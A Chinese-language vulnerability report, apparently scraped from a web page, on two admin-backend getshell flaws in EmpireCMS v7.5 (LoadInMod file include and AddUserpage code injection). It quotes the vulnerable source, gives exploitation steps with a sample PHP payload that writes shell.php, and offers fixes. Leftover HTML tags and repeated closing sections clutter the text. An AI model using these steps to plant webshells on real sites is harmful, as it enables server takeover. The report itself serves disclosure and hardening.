EmpireCMS v7.5 后台多处Getshell漏洞分析报告<\/h1>

漏洞概述<\/h2>
EmpireCMS v7.5 后台存在多处文件上传和代码执行漏洞，攻击者可以利用这些漏洞在服务器上获取webshell权限。本报告详细分析了两处典型漏洞的利用方式和原理。<\/p>

漏洞一：LoadInMod功能文件上传漏洞<\/h2>

漏洞位置<\/h3>
`ecmsmod.php<\/code> 第155-162行<\/p>`

漏洞代码分析<\/h3>
elseif<\/span>($enews==<\/span>"LoadInMod"<\/span>) {
<\/span><\/span>    $file=<\/span>$_FILES['file'<\/span>]['tmp_name'<\/span>];
<\/span><\/span>    $file_name=<\/span>$_FILES['file'<\/span>]['name'<\/span>];
<\/span><\/span>    $file_type=<\/span>$_FILES['file'<\/span>]['type'<\/span>];
<\/span><\/span>    $file_size=<\/span>$_FILES['file'<\/span>]['size'<\/span>];
<\/span><\/span>    LoadInMod<\/span>($_POST,$file,$file_name,$file_type,$file_size,$logininid,$loginin);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>LoadInMod函数分析<\/h3>
function<\/span> LoadInMod<\/span>($add,$file,$file_name,$file_type,$file_size,$userid,$username){
<\/span><\/span>    \/\/ 验证权限
<\/span><\/span><\/span><\/span>    CheckLevel<\/span>($userid,$username,$classid,"table"<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 基本验证
<\/span><\/span><\/span><\/span>    $tbname=<\/span>RepPostVar<\/span>(trim<\/span>($add['tbname'<\/span>]));
<\/span><\/span>    if<\/span>(!<\/span>$file_name||!<\/span>$file_size||!<\/span>$tbname) {
<\/span><\/span>        printerror<\/span>("EmptyLoadInMod"<\/span>,""<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 文件类型验证
<\/span><\/span><\/span><\/span>    $filetype=<\/span>GetFiletype<\/span>($file_name);
<\/span><\/span>    if<\/span>($filetype!=<\/span>".mod"<\/span>) {
<\/span><\/span>        printerror<\/span>("LoadInModMustmod"<\/span>,""<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 表名检查
<\/span><\/span><\/span><\/span>    $num=<\/span>$empire-><\/span>gettotal<\/span>("select count(*) as total from <\/span>{<\/span>$dbtbpre}<\/span>enewstable where tbname='<\/span>$tbname<\/span>' limit 1"<\/span>);
<\/span><\/span>    if<\/span>($num) {
<\/span><\/span>        printerror<\/span>("HaveLoadInTb"<\/span>,""<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 文件上传
<\/span><\/span><\/span><\/span>    $path=<\/span>ECMS_PATH<\/span>.<\/span>"e\/data\/tmp\/mod\/uploadm"<\/span>.<\/span>time<\/span>().<\/span>make_password<\/span>(10<\/span>).<\/span>".php"<\/span>;
<\/span><\/span>    $cp=@<\/span>move_uploaded_file<\/span>($file,$path);
<\/span><\/span>    if<\/span>(!<\/span>$cp) {
<\/span><\/span>        printerror<\/span>("EmptyLoadInMod"<\/span>,""<\/span>);
<\/span><\/span>    }
<\/span><\/span>    DoChmodFile<\/span>($path);
<\/span><\/span>    @<\/span>include<\/span>($path); \/\/ 关键漏洞点
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用方式<\/h3>

构造一个.mod扩展名的文件，内容为PHP代码<\/li>
通过后台LoadInMod功能上传该文件<\/li>
文件会被上传到e\/data\/tmp\/mod\/<\/code>目录下并包含执行<\/li>
<\/ol>
示例攻击代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>    file_put_contents<\/span>("shell.php"<\/span>,"<?php phpinfo(); ?>"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>漏洞利用限制<\/h3>

需要后台管理员权限<\/li>
文件名包含随机部分(make_password(10))，但不需要预测，因为包含操作会执行上传的文件<\/li>
<\/ul>
漏洞二：AddUserpage功能代码注入漏洞<\/h2>
漏洞位置<\/h3>
ecmscom.php<\/code> 第46行<\/p>
漏洞代码分析<\/h3>
if<\/span>($enews==<\/span>"AddUserpage"<\/span>) {
<\/span><\/span>    AddUserpage<\/span>($_POST,$logininid,$loginin);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>AddUserpage函数分析<\/h3>
function<\/span> AddUserpage<\/span>($add,$userid,$username){
<\/span><\/span>    \/\/ 权限检查
<\/span><\/span><\/span><\/span>    CheckLevel<\/span>($userid,$username,$classid,"userpage"<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 参数处理
<\/span><\/span><\/span><\/span>    $classid=<\/span>(int<\/span>)$add[classid<\/span>];
<\/span><\/span>    $title=<\/span>$add['title'<\/span>];
<\/span><\/span>    $path=<\/span>$add['path'<\/span>];
<\/span><\/span>    $pagetext=<\/span>$add['pagetext'<\/span>];
<\/span><\/span>    
<\/span><\/span>    \/\/ 基本验证
<\/span><\/span><\/span><\/span>    if<\/span>(empty<\/span>($title)||<\/span>empty<\/span>($path)) {
<\/span><\/span>        printerror<\/span>("EmptyUserpagePath"<\/span>,"history.go(-1)"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 过滤处理
<\/span><\/span><\/span><\/span>    $title=<\/span>hRepPostStr<\/span>($title,1<\/span>);
<\/span><\/span>    $path=<\/span>hRepPostStr<\/span>($path,1<\/span>);
<\/span><\/span>    $pagetext=<\/span>RepPhpAspJspcode<\/span>($pagetext); \/\/ 关键过滤函数
<\/span><\/span><\/span><\/span>    $pagetitle=<\/span>RepPhpAspJspcode<\/span>($add[pagetitle<\/span>]);
<\/span><\/span>    $pagekeywords=<\/span>RepPhpAspJspcode<\/span>($add[pagekeywords<\/span>]);
<\/span><\/span>    $pagedescription=<\/span>RepPhpAspJspcode<\/span>($add[pagedescription<\/span>]);
<\/span><\/span>    
<\/span><\/span>    \/\/ 数据库操作
<\/span><\/span><\/span><\/span>    $tempid=<\/span>(int<\/span>)$add['tempid'<\/span>];
<\/span><\/span>    $gid=<\/span>(int<\/span>)$add['gid'<\/span>];
<\/span><\/span>    $sql=<\/span>$empire-><\/span>query<\/span>("insert into <\/span>{<\/span>$dbtbpre}<\/span>enewspage(...) values(...)"<\/span>);
<\/span><\/span>    $id=<\/span>$empire-><\/span>lastid<\/span>();
<\/span><\/span>    
<\/span><\/span>    \/\/ 关键漏洞点
<\/span><\/span><\/span><\/span>    ReUserpage<\/span>($id,$pagetext,$path,$title,$pagetitle,$pagekeywords,$pagedescription,$tempid);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>RepPhpAspJspcode函数分析<\/h3>
function<\/span> RepPhpAspJspcode<\/span>($string){
<\/span><\/span>    global<\/span> $public_r;
<\/span><\/span>    \/\/ 关键问题：$public_r[candocode]默认为1，导致过滤无效
<\/span><\/span><\/span><\/span>    if<\/span>(!<\/span>$public_r[candocode<\/span>]){
<\/span><\/span>        \/\/ 实际过滤代码不会执行
<\/span><\/span><\/span><\/span>        $string=<\/span>str_replace<\/span>("<<\/span>\\<\/span>"<\/span>,"<<\/span>\\<\/span>"<\/span>,$string);
<\/span><\/span>        $string=<\/span>str_replace<\/span>("<\/span>\\<\/span>>"<\/span>,"<\/span>\\<\/span>>"<\/span>,$string);
<\/span><\/span>        $string=<\/span>str_replace<\/span>("<?"<\/span>,"<?"<\/span>,$string);
<\/span><\/span>        $string=<\/span>str_replace<\/span>("<%"<\/span>,"<%"<\/span>,$string);
<\/span><\/span>        if<\/span>(@<\/span>stristr<\/span>($string,' language'<\/span>)) {
<\/span><\/span>            $string=<\/span>preg_replace<\/span>(array<\/span>('!<script!i'<\/span>,'!<\/script>!i'<\/span>),array<\/span>('<script'<\/span>,'<\/script>'<\/span>),$string);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $string;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>ReUserpage函数分析<\/h3>
function<\/span> ReUserpage<\/span>($id,$pagetext,$path,$title=<\/span>""<\/span>,$pagetitle,$pagekeywords,$pagedescription,$tempid=<\/span>0<\/span>){
<\/span><\/span>    global<\/span> $public_r;
<\/span><\/span>    if<\/span>(empty<\/span>($path)) {
<\/span><\/span>        return<\/span> ""<\/span>;
<\/span><\/span>    }
<\/span><\/span>    $path=<\/span>eReturnTrueEcmsPath<\/span>().<\/span>'e\/data\/'<\/span>.<\/span>$path;
<\/span><\/span>    DoFileMkDir<\/span>($path);\/\/建目录
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ 模板处理
<\/span><\/span><\/span><\/span>    if<\/span>($tempid) {
<\/span><\/span>        $pagestr=<\/span>GetPageTemp<\/span>($tempid);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        $pagestr=<\/span>$pagetext;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    $pagestr=<\/span>InfoNewsBq<\/span>("page"<\/span>.<\/span>$id,$pagestr); \/\/ 关键处理
<\/span><\/span><\/span><\/span>    $pagestr=<\/span>RepUserpageVar<\/span>($pagetext,$title,$pagetitle,$pagekeywords,$pagedescription,$pagestr,$id);
<\/span><\/span>    $pagestr=<\/span>str_replace<\/span>("[!--news.url--]"<\/span>,$public_r['newsurl'<\/span>],$pagestr);
<\/span><\/span>    WriteFiletext<\/span>($path,$pagestr); \/\/ 写入文件
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>InfoNewsBq函数分析<\/h3>
function<\/span> InfoNewsBq<\/span>($classid,$indextext){
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $file=<\/span>eReturnTrueEcmsPath<\/span>().<\/span>'e\/data\/tmp\/temp'<\/span>.<\/span>$classid.<\/span>'.php'<\/span>;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $indextext=<\/span>stripSlashes<\/span>($indextext);
<\/span><\/span>    $indextext=<\/span>ReplaceTempvar<\/span>($indextext);
<\/span><\/span>    $indextext=<\/span>DoRepEcmsLoopBq<\/span>($indextext);
<\/span><\/span>    $indextext=<\/span>RepBq<\/span>($indextext);
<\/span><\/span>    
<\/span><\/span>    \/\/ 写入临时文件
<\/span><\/span><\/span><\/span>    WriteFiletext<\/span>($file,AddCheckViewTempCode<\/span>().<\/span>$indextext);
<\/span><\/span>    
<\/span><\/span>    \/\/ 包含执行
<\/span><\/span><\/span><\/span>    ob_start<\/span>();
<\/span><\/span>    include<\/span>($file); \/\/ 关键漏洞点
<\/span><\/span><\/span><\/span>    $string=<\/span>ob_get_contents<\/span>();
<\/span><\/span>    ob_end_clean<\/span>();
<\/span><\/span>    $string=<\/span>RepExeCode<\/span>($string);
<\/span><\/span>    return<\/span> $string;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用方式<\/h3>

通过AddUserpage功能提交恶意代码<\/li>
由于RepPhpAspJspcode过滤失效，代码会被保留<\/li>
最终通过InfoNewsBq函数的include操作执行恶意代码<\/li>
<\/ol>
示例攻击代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>    file_put_contents<\/span>("shell.php"<\/span>,"<?php phpinfo(); ?>"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>漏洞利用限制<\/h3>

需要后台管理员权限<\/li>
默认配置下($public_r[candocode]=1)可直接利用<\/li>
<\/ul>
漏洞修复建议<\/h2>


LoadInMod漏洞修复<\/strong>：<\/p>

移除不必要的文件包含操作(@include($path))<\/li>
增加文件内容安全检查<\/li>
<\/ul>
<\/li>

AddUserpage漏洞修复<\/strong>：<\/p>

修改默认配置，设置$public_r[candocode]=0<\/li>
使用更安全的RepPhpAspJspcodeText函数替代RepPhpAspJspcode<\/li>
避免在InfoNewsBq函数中直接包含用户可控内容<\/li>
<\/ul>
<\/li>

通用建议：<\/p>

对所有用户输入进行严格过滤<\/li>
避免在文件操作中使用用户可控参数<\/li>
限制后台功能权限<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
EmpireCMS v7.5后台存在多处安全漏洞，主要问题集中在文件上传和代码执行方面。攻击者可以利用这些漏洞在获取后台权限后进一步获取服务器控制权。建议用户及时更新到最新版本或按照修复建议进行安全加固。<\/p>

EmpireCMS v7.5 后台多处Getshell漏洞分析报告<\/h1>

漏洞概述<\/h2> EmpireCMS v7.5 后台存在多处文件上传和代码执行漏洞，攻击者可以利用这些漏洞在服务器上获取webshell权限。本报告详细分析了两处典型漏洞的利用方式和原理。<\/p>

漏洞一：LoadInMod功能文件上传漏洞<\/h2>

漏洞位置<\/h3> ecmsmod.php<\/code> 第155-162行<\/p>

漏洞二：AddUserpage功能代码注入漏洞<\/h2>

漏洞位置<\/h3> ecmscom.php<\/code> 第46行<\/p>

总结<\/h2> EmpireCMS v7.5后台存在多处安全漏洞，主要问题集中在文件上传和代码执行方面。攻击者可以利用这些漏洞在获取后台权限后进一步获取服务器控制权。建议用户及时更新到最新版本或按照修复建议进行安全加固。<\/p>

漏洞概述<\/h2>
EmpireCMS v7.5 后台存在多处文件上传和代码执行漏洞，攻击者可以利用这些漏洞在服务器上获取webshell权限。本报告详细分析了两处典型漏洞的利用方式和原理。<\/p>

漏洞位置<\/h3>
`ecmsmod.php<\/code> 第155-162行<\/p>`

漏洞位置<\/h3>
`ecmscom.php<\/code> 第46行<\/p>`

总结<\/h2>
EmpireCMS v7.5后台存在多处安全漏洞，主要问题集中在文件上传和代码执行方面。攻击者可以利用这些漏洞在获取后台权限后进一步获取服务器控制权。建议用户及时更新到最新版本或按照修复建议进行安全加固。<\/p>